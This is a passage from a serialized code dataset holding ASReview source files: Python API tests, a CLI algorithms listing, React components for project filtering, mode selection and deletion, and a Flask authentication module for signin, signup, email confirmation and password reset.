setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # label 2 random records\n au.label_random_project_data_record(client, project, 1)\n au.label_random_project_data_record(client, project, 0)\n # get progress\n status_code, data = au.get_project_progress(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert data[\"n_excluded\"] == 1\n assert data[\"n_included\"] == 1\n assert data[\"n_pool\"] == data[\"n_papers\"] - 2\n\n\n# Test get progress density on the article\ndef test_get_progress_density(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # request progress density\n status_code, data = au.get_project_progress_density(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert isinstance(data[\"relevant\"], list)\n assert isinstance(data[\"irrelevant\"], list)\n\n\n# Test progress recall\ndef test_get_progress_recall(setup):\n client, _, project = setup\n # upload dataset\n au.upload_data_to_project(client, project, data=UPLOAD_DATA[0])\n # get recall\n status_code, data = au.get_project_progress_recall(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert isinstance(data[\"asreview\"], list)\n assert isinstance(data[\"random\"], list)\n\n\n# Test retrieve documents in order to review\ndef test_retrieve_document_for_review(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get a document\n status_code, data = au.get_project_current_document(client, project)\n assert status_code == 200\n assert isinstance(data, dict)\n assert not data[\"pool_empty\"]\n assert isinstance(data[\"result\"], dict)\n assert isinstance(data[\"result\"][\"doc_id\"], int)\n\n\n# Test label a document after the model has been started\ndef test_label_a_document_with_running_model(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get a document\n _, data = au.get_project_current_document(client, project)\n # get id\n doc_id = data[\"result\"][\"doc_id\"]\n # label it\n status_code, data = au.label_project_record(\n client, project, doc_id, label=1, prior=0, note=\"note\"\n )\n assert status_code == 200\n assert data[\"success\"]\n time.sleep(10)\n\n\n# Test update label of a document after the model has been started\ndef test_update_label_of_document_with_running_model(setup):\n client, _, project = setup\n # start the show\n au.upload_label_set_and_start_model(client, project, UPLOAD_DATA[0])\n # get a document\n _, data = au.get_project_current_document(client, project)\n # get id\n doc_id = data[\"result\"][\"doc_id\"]\n # label it\n au.label_project_record(client, project, doc_id, label=1, prior=0, note=\"note\")\n # change label\n status_code, data = au.update_label_project_record(\n client, project, doc_id, label=0, prior=0, note=\"changed note\"\n )\n assert status_code == 200\n assert data[\"success\"]\n time.sleep(10)\n\n\n# Test deleting a project\ndef test_delete_project(setup):\n client, _, project = setup\n # delete project\n status_code, data = au.delete_project(client, project)\n assert status_code == 200\n assert data[\"success\"]\n\n\[email protected](\n \"api_call\",\n [\n au.get_all_projects,\n au.create_project,\n au.create_project_from_dict,\n au.update_project,\n au.upgrade_project,\n au.get_project_stats,\n au.get_demo_data,\n au.upload_data_to_project,\n au.get_project_data,\n au.get_project_dataset_writer,\n au.search_project_data,\n au.get_prior_random_project_data,\n au.label_project_record,\n au.update_label_project_record,\n au.get_labeled_project_data,\n au.get_labeled_project_data_stats,\n au.get_project_algorithms_options,\n au.set_project_algorithms,\n au.get_project_algorithms,\n au.start_project_algorithms,\n au.get_project_status,\n au.set_project_status,\n au.export_project_dataset,\n au.export_project,\n au.get_project_progress,\n au.get_project_progress_density,\n au.get_project_progress_recall,\n au.get_project_current_document,\n au.delete_project,\n ],\n)\ndef test_unauthorized_use_of_api_calls(setup, api_call):\n client, user, project = setup\n if current_app_is_authenticated():\n # signout the client\n au.signout_user(client)\n # inspect function\n sig = inspect.signature(api_call)\n # form parameters\n parms = []\n for par in sig.parameters.keys():\n annotation = sig.parameters[par].annotation\n if annotation == FlaskClient:\n parms.append(client)\n elif annotation == Union[Project, ASReviewProject]:\n parms.append(project)\n elif annotation == int:\n parms.append(1)\n elif annotation == str:\n parms.append(\"abc\")\n elif annotation == dict:\n parms.append({})\n\n # make the api call\n status_code, data = api_call(*parms)\n assert status_code == 401\n assert data[\"message\"] == \"Login required.\"\n else:\n # no asserts in an unauthenticated app\n pass\n" }, { "alpha_fraction": 0.7362534999847412, "alphanum_fraction": 0.7362534999847412, "avg_line_length": 28.80555534362793, "blob_id": "1d8a69dad6d053320c9bc670c57990a357ba6947", "content_id": "5787320157445a62917966bdd37a8e857170704d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1073, "license_type": "permissive", "max_line_length": 81, "num_lines": 36, "path": "/asreview/webapp/tests/test_database_and_models/test_database_creation.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# GOAL: test database creation if app is started with authentication\nfrom pathlib import Path\n\nimport pytest\nimport sqlalchemy\nfrom sqlalchemy import create_engine\n\nfrom asreview.utils import asreview_path\n\n\ndef get_db_path():\n return Path(asreview_path() / \"asreview.test.sqlite\")\n\n\n# checks if asreview path does not contain a database if app\n# is unauthenticated\ndef test_database_is_not_created_if_unauth_app(unauth_app):\n assert Path(asreview_path()).exists()\n assert get_db_path().exists() is False\n\n\n# checks is asreview path contains database if app is\n# authenticated\ndef test_database_exists_after_starting_auth_app(auth_app):\n assert Path(asreview_path()).exists()\n assert get_db_path().exists()\n\n\n# checks if all tables were created\[email protected](\n \"table\", [\"collaboration_invitations\", \"collaborations\", \"projects\", \"users\"]\n)\ndef test_if_db_table_exists(auth_app, table):\n engine = create_engine(f\"sqlite:///{str(get_db_path())}\")\n table_names = sqlalchemy.inspect(engine).get_table_names()\n assert table in table_names\n" }, { "alpha_fraction": 0.6291581392288208, "alphanum_fraction": 0.6373716592788696, "avg_line_length": 30.623376846313477, "blob_id": "1cc6d54b8e4c04bdb9de5dd3e73d11437ea26fdf", "content_id": "31b47aa74d25b7382007ec6004a100843269affd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2435, "license_type": "permissive", "max_line_length": 80, "num_lines": 77, "path": "/asreview/entry_points/algorithms.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.models.balance import list_balance_strategies\nfrom asreview.models.classifiers import list_classifiers\nfrom asreview.models.feature_extraction import list_feature_extraction\nfrom asreview.models.query import list_query_strategies\n\n\ndef _format_algorithm(values, name, description):\n s = f\" {name: <20}Available {description}:\\n\\n\"\n\n result = []\n\n for x in values:\n if hasattr(x, \"label\"):\n result.append(\n \" \" * 22 + f\"{x.name}\" + \" \" * (16 - len(x.name)) + f\"{x.label}\"\n )\n else:\n result.append(\" \" * 22 + f\"{x.name}\")\n\n s += \"\\n\".join(result)\n s += \"\\n\\n\"\n\n return s\n\n\nclass AlgorithmsEntryPoint(BaseEntryPoint):\n \"\"\"Entry point to list available algorithms in ASReview LAB.\"\"\"\n\n description = \"Available active learning algorithms for ASReview.\"\n\n def execute(self, argv):\n s = \"Available active learning algorithms for ASReview. \\n\\n\"\n\n # feature_extraction\n s += _format_algorithm(\n values=list_feature_extraction(),\n name=\"feature_extraction\",\n description=\"feature extraction algorithms\",\n )\n\n # classifiers\n s += _format_algorithm(\n values=list_classifiers(),\n name=\"classifiers\",\n description=\"classification algorithms\",\n )\n\n # query_strategies\n s += _format_algorithm(\n values=list_query_strategies(),\n name=\"query_strategies\",\n description=\"query strategies\",\n )\n\n # balance_strategies\n s += _format_algorithm(\n values=list_balance_strategies(),\n name=\"balance_strategies\",\n description=\"balance strategies\",\n )\n\n print(s)\n" }, { "alpha_fraction": 0.5499283075332642, "alphanum_fraction": 0.5537505745887756, "avg_line_length": 24.839506149291992, "blob_id": "c500a730e31c6f3e09973cc33703b157c0832be5", "content_id": "96c855338de5089b181bbd3cc31db92268d793f3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2093, "license_type": "permissive", "max_line_length": 76, "num_lines": 81, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/Filter.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Autocomplete, IconButton, InputBase, Popper } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { FilterList } from \"@mui/icons-material\";\n\nimport { historyFilterOptions } from \"../../globals.js\";\n\nconst PREFIX = \"Filter\";\n\nconst classes = {\n icon: `${PREFIX}-icon`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n padding: \"4px 16px\",\n [`& .${classes.icon}`]: {\n color: theme.palette.text.secondary,\n [`:hover`]: {\n backgroundColor: \"transparent\",\n },\n },\n}));\n\nexport default function Filter(props) {\n const filterInput = React.useRef(null);\n\n const customPopper = (props) => {\n return (\n <Popper {...props} style={{ width: 160 }} placement=\"bottom-start\" />\n );\n };\n\n const onClickFilter = () => {\n filterInput.current.focus();\n };\n\n return (\n <Root>\n <IconButton className={classes.icon} onClick={onClickFilter}>\n <FilterList fontSize={!props.mobileScreen ? \"medium\" : \"small\"} />\n </IconButton>\n <Autocomplete\n id=\"filter labeled record\"\n sx={{ ml: 1, flex: 1, display: \"flex\" }}\n blurOnSelect\n disableClearable\n freeSolo\n filterSelectedOptions\n multiple\n openOnFocus\n options={historyFilterOptions}\n getOptionLabel={(option) => option.label}\n PopperComponent={customPopper}\n renderInput={(params) => {\n const { InputLabelProps, InputProps, ...rest } = params;\n return (\n <InputBase\n {...params.InputProps}\n {...rest}\n inputRef={filterInput}\n placeholder={!props.filterQuery.length ? \"Filter\" : \"\"}\n readOnly\n />\n );\n }}\n onChange={(event, value) => {\n props.setFilterQuery(value);\n }}\n value={props.filterQuery}\n />\n {/*\n <Tooltip title=\"Remove filter\">\n <IconButton className={classes.icon}>\n <Close />\n </IconButton>\n </Tooltip>\n */}\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.5222734212875366, "alphanum_fraction": 0.5299538969993591, "avg_line_length": 28.590909957885742, "blob_id": "a790013a1bd9c7f33f4e5c025905ef4e187b0e3d", "content_id": "9675e3bd69065b003d8c619c8141b8023417170c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1302, "license_type": "permissive", "max_line_length": 81, "num_lines": 44, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/ExplorationModeBanner.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Banner } from \"material-ui-banner\";\nimport InfoOutlinedIcon from \"@mui/icons-material/InfoOutlined\";\n\nconst ExplorationModeBanner = (props) => {\n return (\n <div aria-label=\"exploration mode banner\">\n <Banner\n open={props.explorationMode}\n onClose={() => props.setExplorationMode(false)}\n label=\"You are reviewing a completely labeled dataset.\"\n icon={<InfoOutlinedIcon sx={{ color: \"text.secondary\" }} />}\n iconProps={{\n sx: { bgcolor: \"transparent\" },\n }}\n buttonLabel=\"Learn more\"\n buttonProps={{\n href: \"https://asreview.readthedocs.io/en/latest/lab/exploration.html\",\n target: \"_blank\",\n sx: { color: \"text.secondary\" },\n }}\n dismissButtonLabel=\"Got it\"\n dismissButtonProps={{\n sx: { color: \"text.secondary\" },\n }}\n paperProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.50\",\n },\n }}\n cardProps={{\n sx: {\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.900\" : \"grey.50\",\n },\n }}\n appBar\n />\n </div>\n );\n};\n\nexport default ExplorationModeBanner;\n" }, { "alpha_fraction": 0.5880758762359619, "alphanum_fraction": 0.5880758762359619, "avg_line_length": 20.705883026123047, "blob_id": "05949de730695d025b73e2d5be4b6653d05ffa9e", "content_id": "f3feb152b66310ba556227ae80579a86139d1119", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 369, "license_type": "permissive", "max_line_length": 48, "num_lines": 17, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/DashboardPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Box, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst DashboardPage = (props) => {\n return (\n <Root aria-label=\"projects page\">\n <Fade in>\n <Box>{props.children}</Box>\n </Fade>\n </Root>\n );\n};\n\nexport default DashboardPage;\n" }, { "alpha_fraction": 0.5699096322059631, "alphanum_fraction": 0.5699096322059631, "avg_line_length": 29.338708877563477, "blob_id": "730d7287305fa70dba402a467fe3bfc1fc456d10", "content_id": "0187d6953bfa6dcaed92c63b0b6677a5b60b206d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1881, "license_type": "permissive", "max_line_length": 114, "num_lines": 62, "path": "/asreview/webapp/src/ProjectComponents/ProjectModeSelect.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport {\n FormControl,\n FormHelperText,\n InputLabel,\n MenuItem,\n Select,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { SelectItem } from \"../ProjectComponents\";\nimport { projectModes } from \"../globals.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nexport default function ProjectModeSelect(props) {\n return (\n <Root>\n <FormControl\n disabled={props.disableModeSelect}\n fullWidth\n variant={!props.disableModeSelect ? \"outlined\" : \"filled\"}\n >\n <InputLabel id=\"mode-select-label\">Mode</InputLabel>\n <Select\n labelId=\"mode-select-label\"\n id=\"mode-select\"\n inputProps={{\n onFocus: () => props.onFocus(),\n onBlur: () => props.onBlur(),\n }}\n name=\"mode\"\n label=\"Mode\"\n value={props.mode}\n onChange={props.handleMode}\n >\n <MenuItem value={projectModes.ORACLE} divider>\n <SelectItem\n primary=\"Oracle\"\n secondary=\"Review your dataset with interactive artificial intelligence (AI)\"\n />\n </MenuItem>\n <MenuItem value={projectModes.EXPLORATION} divider>\n <SelectItem\n primary=\"Exploration\"\n secondary=\"Explore or demonstrate ASReview LAB with a completely labeled dataset\"\n />\n </MenuItem>\n <MenuItem value={projectModes.SIMULATION}>\n <SelectItem\n primary=\"Simulation\"\n secondary=\"Simulate a review on a completely labeled dataset to see the performance of ASReview LAB\"\n />\n </MenuItem>\n </Select>\n {props.datasetAdded && (\n <FormHelperText>Editing mode removes the added data</FormHelperText>\n )}\n </FormControl>\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.5662159323692322, "alphanum_fraction": 0.5666452050209045, "avg_line_length": 28.118749618530273, "blob_id": "ad4afe268435c7e1c4670d955463f3dcef3870a2", "content_id": "ac600b65990bffce032f943b8149496acdc2a767", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4659, "license_type": "permissive", "max_line_length": 88, "num_lines": 160, "path": "/asreview/webapp/src/ProjectComponents/ProjectDeleteDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { useSelector, useDispatch } from \"react-redux\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport {\n Alert,\n Button,\n Dialog,\n DialogActions,\n DialogContent,\n DialogTitle,\n Stack,\n Typography,\n TextField,\n} from \"@mui/material\";\nimport { TeamAPI, ProjectAPI } from \"../api/index.js\";\nimport { setMyProjects } from \"../redux/actions\";\nimport useAuth from \"../hooks/useAuth\";\n\nconst ProjectDeleteDialog = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const { auth } = useAuth();\n const authenticated = useSelector((state) => state.authentication);\n const dispatch = useDispatch();\n\n const descriptionElementRef = React.useRef(null);\n const [deleteInput, setDeleteInput] = React.useState(\"\");\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateDeleteProject,\n {\n onSuccess: () => {\n if (!project_id) {\n queryClient.invalidateQueries(\"fetchProjects\");\n queryClient.invalidateQueries(\"fetchDashboardStats\");\n props.toggleDeleteDialog();\n } else {\n navigate(\"/projects\");\n }\n },\n },\n );\n\n const endCollaboration = () => {\n if (authenticated && props.project_id && auth.id) {\n TeamAPI.endCollaboration(props.project_id, auth.id)\n .then((data) => {\n if (data.success) {\n // success, the collaboration was ended, get all projects\n ProjectAPI.fetchProjects({})\n .then((data) => {\n if (data.result instanceof Array) {\n // refresh project list\n dispatch(setMyProjects(data.result));\n // close dialog\n props.toggleDeleteDialog();\n } else {\n console.log(\"Could not get projects list -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not pull all projects\", err));\n } else {\n console.log(\"Could not end collaboration -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not end collaboration\", err));\n }\n };\n\n const onChangeTitle = (event) => {\n if (isError) {\n reset();\n }\n setDeleteInput(event.target.value);\n };\n\n const cancelDelete = () => {\n props.toggleDeleteDialog();\n reset();\n };\n\n const disableConfirmButton = () => {\n return deleteInput !== props.projectTitle || isLoading;\n };\n\n React.useEffect(() => {\n if (props.onDeleteDialog) {\n const { current: descriptionElement } = descriptionElementRef;\n if (descriptionElement !== null) {\n descriptionElement.focus();\n }\n }\n }, [props.onDeleteDialog]);\n\n const warningSuffix = () => {\n // which project are we talking about?\n if (props.isOwner) {\n return \", including the dataset, review history, notes, and model configuration.\";\n } else {\n return \" from your list\";\n }\n };\n\n return (\n <Dialog\n open={props.onDeleteDialog}\n onClose={cancelDelete}\n scroll=\"paper\"\n fullWidth\n maxWidth=\"sm\"\n >\n <DialogTitle>Permanently delete this project?</DialogTitle>\n <DialogContent dividers>\n <Stack spacing={3}>\n {isError && <Alert severity=\"error\">{error[\"message\"]}</Alert>}\n <Stack spacing={2}>\n <Typography>\n This action <b>cannot</b> be undone. This will permanently delete\n the <b>{props.projectTitle}</b> project{warningSuffix()}\n </Typography>\n <Typography>\n Please type <b>{props.projectTitle}</b> to confirm.\n </Typography>\n </Stack>\n <TextField\n autoComplete=\"off\"\n autoFocus\n fullWidth\n required\n name=\"project-title\"\n id=\"project-title\"\n label=\"Title\"\n onChange={onChangeTitle}\n />\n </Stack>\n </DialogContent>\n <DialogActions>\n <Button onClick={cancelDelete}>Cancel</Button>\n {props.isOwner && (\n <Button\n onClick={() => mutate({ project_id: props.project_id })}\n disabled={disableConfirmButton()}\n >\n Delete Forever\n </Button>\n )}\n {!props.isOwner && (\n <Button onClick={endCollaboration} disabled={disableConfirmButton()}>\n Delete\n </Button>\n )}\n </DialogActions>\n </Dialog>\n );\n};\n\nexport default ProjectDeleteDialog;\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 53, "blob_id": "123c4fa2e4635abe95d23662b79dbe9760fd1e2a", "content_id": "c06671edc4ca524c2a7047aa2c1d7a16874b0b77", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 216, "license_type": "permissive", "max_line_length": 57, "num_lines": 4, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as DataForm } from \"./DataForm\";\nexport { default as DataFormCard } from \"./DataFormCard\";\nexport { default as DetailsPage } from \"./DetailsPage\";\nexport { default as ModelForm } from \"./ModelForm\";\n" }, { "alpha_fraction": 0.5526171922683716, "alphanum_fraction": 0.5605398416519165, "avg_line_length": 35.24158477783203, "blob_id": "16449b1036b8381c632b2e64d57268d0578d0a18", "content_id": "e948d3511639669b4f01e48f065eeca529d2e305", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18302, "license_type": "permissive", "max_line_length": 88, "num_lines": 505, "path": "/asreview/webapp/api/auth.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport datetime as dt\nfrom pathlib import Path\n\nfrom flask import Blueprint\nfrom flask import current_app\nfrom flask import jsonify\nfrom flask import render_template_string\nfrom flask import request\nfrom flask_login import current_user\nfrom flask_login import login_user\nfrom flask_login import logout_user\nfrom flask_mail import Mail\nfrom flask_mail import Message\nfrom sqlalchemy import and_\nfrom sqlalchemy import or_\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.login_required import asreview_login_required\nfrom asreview.webapp.authentication.models import User\nfrom asreview.webapp.authentication.oauth_handler import OAuthHandler\n\nbp = Blueprint(\"auth\", __name__, url_prefix=\"/auth\")\n\n\ndef perform_login_user(user):\n \"\"\"Helper function to login a user\"\"\"\n return login_user(user, remember=True, duration=dt.timedelta(days=31))\n\n\n# TODO: not sure if this file is the right place for this function\ndef send_forgot_password_email(user, request, cur_app):\n # do not send email in test environment\n if not cur_app.testing:\n # get necessary information out of user object\n name = user.name or \"ASReview user\"\n # email config\n config = cur_app.config.get(\"EMAIL_CONFIG\")\n # get url of front-end\n root_url = request.headers.get(\"Origin\")\n # create url that will be used in the email\n url = f\"{root_url}/reset_password?user_id={user.id}&token={user.token}\"\n # create a mailer\n mailer = Mail(cur_app)\n # open templates as string and render\n root_path = Path(cur_app.root_path)\n with open(root_path / \"templates/emails/forgot_password.html\", \"r\") as f:\n html_text = render_template_string(f.read(), name=name, url=url)\n with open(root_path / \"templates/emails/forgot_password.txt\", \"r\") as f:\n txt_text = render_template_string(f.read(), name=name, url=url)\n # create message\n msg = Message(\n \"ASReview: forgot password\",\n recipients=[user.email],\n sender=config.get(\"REPLY_ADDRESS\"),\n )\n msg.body = txt_text\n msg.html = html_text\n return mailer.send(msg)\n\n\n# TODO: not sure if this file is the right place for this function\ndef send_confirm_account_email(user, request, cur_app):\n # do not send email in test environment\n if not cur_app.testing:\n # get necessary information out of user object\n name = user.name or \"ASReview user\"\n # email config\n config = cur_app.config.get(\"EMAIL_CONFIG\")\n # get url of front-end\n root_url = request.headers.get(\"Origin\")\n # create url that will be used in the email\n url = f\"{root_url}/confirm_account?user_id={user.id}&token={user.token}\"\n # create a mailer\n mailer = Mail(cur_app)\n # open templates as string and render\n root_path = Path(cur_app.root_path)\n with open(root_path / \"templates/emails/confirm_account.html\", \"r\") as f:\n html_text = render_template_string(f.read(), name=name, url=url)\n with open(root_path / \"templates/emails/confirm_account.txt\", \"r\") as f:\n txt_text = render_template_string(f.read(), name=name, url=url)\n # create message\n msg = Message(\n \"ASReview: please confirm your account\",\n recipients=[user.email],\n sender=config.get(\"REPLY_ADDRESS\"),\n )\n msg.body = txt_text\n msg.html = html_text\n return mailer.send(msg)\n\n\n# ------------------\n# ROUTES\n# ------------------\n\n\[email protected](\"/signin\", methods=[\"POST\"])\ndef signin():\n email = request.form.get(\"email\").strip()\n password = request.form.get(\"password\", \"\")\n\n # get the user\n user = User.query.filter(\n or_(User.identifier == email, User.email == email)\n ).one_or_none()\n\n if not user:\n # user does not exsist\n result = (404, {\"message\": f\"User account {email} does not exist.\"})\n elif not user.confirmed:\n # account is not confirmed\n result = (404, {\"message\": f\"User account {email} is not confirmed.\"})\n else:\n # user exists and is confirmed: verify password\n if user.verify_password(password):\n logged_in = perform_login_user(user)\n result = (\n 200,\n {\n \"logged_in\": logged_in,\n \"name\": user.get_name(),\n \"id\": user.id,\n \"message\": f\"User {user.identifier} is logged in.\"\n },\n )\n else:\n # password is wrong\n if user.origin == \"asreview\":\n # if this is an asreview user\n result = (404, {\"message\": f\"Incorrect password for user {email}.\"})\n else:\n # this must be an OAuth user trying to get in with\n # a password\n service = user.origin.capitalize()\n result = (404, {\"message\": f\"Please login with the {service} service.\"})\n\n status, message = result\n response = jsonify(message)\n return response, status\n\n\[email protected](\"/signup\", methods=[\"POST\"])\ndef signup():\n # Can we create accounts?\n if current_app.config.get(\"ALLOW_ACCOUNT_CREATION\", False):\n email = request.form.get(\"email\", \"\").strip()\n name = request.form.get(\"name\", \"\").strip()\n affiliation = request.form.get(\"affiliation\", \"\").strip()\n password = request.form.get(\"password\")\n public = bool(int(request.form.get(\"public\", \"1\")))\n\n # check if email already exists\n user = User.query.filter(\n or_(User.identifier == email, User.email == email)\n ).one_or_none()\n # return error if user doesn't exist\n if isinstance(user, User):\n result = (403, f'User with email \"{email}\" already exists.')\n else:\n try:\n identifier = email\n origin = \"asreview\"\n # are we going to verify the email?\n email_verification = bool(\n current_app.config.get(\"EMAIL_VERIFICATION\", False)\n )\n # set confirmed to False if we 'do' verification. Note\n # that this route only creates 'asreview' accounts\n confirmed = not email_verification\n # create the User account\n user = User(\n identifier=identifier,\n origin=origin,\n email=email,\n name=name,\n affiliation=affiliation,\n password=password,\n confirmed=confirmed,\n public=public,\n )\n # if this is an un-confirmed account, set token\n if not confirmed:\n # set token data\n user = user.set_token_data(\n current_app.config[\"SECRET_KEY\"],\n current_app.config[\"SECURITY_PASSWORD_SALT\"],\n )\n # store user\n DB.session.add(user)\n DB.session.commit()\n # at this stage, if all went well, the User account is\n # stored in the database, send the verification email\n # if applicable\n if email_verification:\n # send email\n send_confirm_account_email(user, request, current_app)\n # result\n result = (\n 201,\n f\"An email has been sent to {user.email} to verify \"\n + \"your account. Please follow instructions.\",\n )\n else:\n # result is a 201 with message\n result = (201, f'User \"{identifier}\" created.')\n except IntegrityError as e:\n DB.session.rollback()\n result = (403, f\"Unable to create your account! Reason: {str(e)}\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (403, f\"Unable to create your account! Reason: {str(e)}\")\n else:\n result = (400, \"The app is not configured to create accounts\")\n\n (status, message) = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/confirm_account\", methods=[\"POST\"])\ndef confirm_account():\n \"\"\"Confirms account with email verification\"\"\"\n\n if current_app.config.get(\"EMAIL_VERIFICATION\", False):\n # find user by token and user id\n user_id = request.form.get(\"user_id\", 0)\n token = request.form.get(\"token\", \"\")\n\n user = User.query.filter(\n and_(User.id == user_id, User.token == token)\n ).one_or_none()\n\n if not user:\n result = (404, \"No user account / correct token found.\")\n elif not user.token_valid(token, max_hours=24):\n message = (\n \"Can not confirm account, token has expired. \"\n + 'Use \"forgot password\" to obtain a new one.'\n )\n result = (403, message)\n else:\n user = user.confirm_user()\n try:\n DB.session.commit()\n result = (200, f\"User {user.identifier} confirmed.\")\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (\n 403,\n f\"Unable to to confirm user {user.identifier}! Reason: {str(e)}\"\n )\n else:\n result = (400, \"The app is not configured to verify accounts.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/get_profile\", methods=[\"GET\"])\n@asreview_login_required\ndef get_profile():\n user = User.query.filter(User.id == current_user.id).one_or_none()\n if user:\n result = (\n 200,\n {\n \"identifier\": user.identifier,\n \"email\": user.email,\n \"origin\": user.origin,\n \"name\": user.name,\n \"affiliation\": user.affiliation,\n \"public\": user.public,\n },\n )\n else:\n result = (404, \"No user found.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/forgot_password\", methods=[\"POST\"])\ndef forgot_password():\n if current_app.config.get(\"EMAIL_CONFIG\", False):\n # get email address from request\n email_address = request.form.get(\"email\", \"\").strip()\n\n # check if email already exists\n user = User.query.filter(\n or_(User.identifier == email_address, User.email == email_address)\n ).one_or_none()\n\n if not user:\n result = (404, f'User with email \"{email_address}\" not found.')\n elif user.origin != \"asreview\":\n result = (404, f\"Your account has been created with {user.origin}.\")\n else:\n # set a token\n user = user.set_token_data(\n current_app.config[\"SECRET_KEY\"],\n current_app.config[\"SECURITY_PASSWORD_SALT\"],\n )\n try:\n # store data\n DB.session.commit()\n # send email\n send_forgot_password_email(user, request, current_app)\n # result\n result = (200, f\"An email has been sent to {email_address}\")\n\n except SQLAlchemyError as e:\n DB.session.rollback()\n result = (403, f\"Unable to to confirm user! Reason: {str(e)}\")\n else:\n result = (404, \"Forgot-password feature is not used in this app.\")\n\n status, message = result\n response = jsonify({\"message\": message})\n return response, status\n\n\[email protected](\"/reset_password\", methods=[\"POST\"])\ndef reset_password():\n \"\"\"Resests password of user\"\"\"\n if current_app.config.get(\"EMAIL_CONFIG\", False):\n\n new_password = request.form.get(\"password\", \"\").strip()\n token = request.form.get(\"token\", \"\").strip()\n user_id = request.form.get(\"user_id\", \"0\").strip()\n user = User.query.filter(User.id == user_id).one_or_none()\n\n if not user:\n result = (\n 404,\n \"User not found, try restarting the forgot-password procedure.\"\n )\n elif not user.token_valid(token, max_hours=24):\n result = (\n 404,\n \"Token is invalid or too old, restart the forgot-password procedure.\"\n )\n else:\n try:\n user = user.reset_password(new_password)\n DB.session.commit()\n result 